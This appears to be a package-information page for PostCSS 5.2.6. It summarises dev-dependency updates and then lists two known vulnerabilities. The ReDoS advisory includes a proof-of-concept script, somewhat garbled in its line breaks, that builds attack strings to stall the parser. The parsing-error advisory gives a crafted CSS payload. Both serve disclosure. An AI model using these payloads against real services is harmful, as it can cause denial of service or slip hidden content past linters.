PostCSS 5.2.6 is a minor update to the popular PostCSS tool, designed for transforming styles with JavaScript plugins. Examining the changes from version 5.2.5 reveals a focus on refining the developer experience and updating dependencies. Most notably, several development dependencies have been updated, indicating a commitment to staying current with the latest tools and best practices. For instance, ava jumped from 0.16.0 to 0.17.0, eslint from 3.8.1 to 3.10.2, jsdoc from 3.4.2 to 3.4.3, fs-extra from 0.30.0 to 1.0.0, babel-core from 6.17.0 to 6.18.2, babel-preset-es2015 from 6.16.0 to 6.18.0,lint-staged from 3.2.0 to 3.2.1 and gulp-sourcemaps from 2.1.1 to 2.2.0. These enhancements likely bring improvements in testing, linting, documentation generation, and overall build process efficiency. For developers, this means a more robust and reliable development environment when contributing to or extending PostCSS. While the core dependencies remain the same, the updated development dependencies can indirectly benefit users by facilitating faster development cycles, better code quality, and ultimately, more stable and feature-rich plugins. The update to fs-extra addresses file system operations, crucial for PostCSS plugins that interact with files. The shift in babel related dependencies ensures compatibility with the evolving JavaScript landscape. All these changes contribute to a smoother and more maintainable development workflow for PostCSS.
All the vulnerabilities related to the version 5.2.6 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.